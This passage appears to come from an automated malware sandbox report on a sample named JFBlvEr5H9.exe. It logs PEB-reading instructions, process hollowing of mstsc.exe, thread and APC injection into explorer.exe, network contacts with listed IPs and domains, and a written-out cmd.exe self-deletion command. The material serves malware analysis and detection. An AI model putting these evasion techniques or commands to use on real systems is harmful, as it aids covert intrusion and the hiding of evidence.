          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.20.84.62 80
          Source: C:\Windows\explorer.exeDomain query: www.pyithuhluttaw.net
          Source: C:\Windows\explorer.exeDomain query: www.aideliveryrobot.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeDomain query: www.anewdistraction.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.91.67.83 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1330000
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Users\user\Desktop\JFBlvEr5H9.exe C:\Users\user\Desktop\JFBlvEr5H9.exe
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe'
          Source: explorer.exe, 00000006.00000000.283745043.0000000005EA0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.263638747.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.264132093.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.506046418.0000000003680000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Users\user\Desktop\JFBlvEr5H9.exe VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
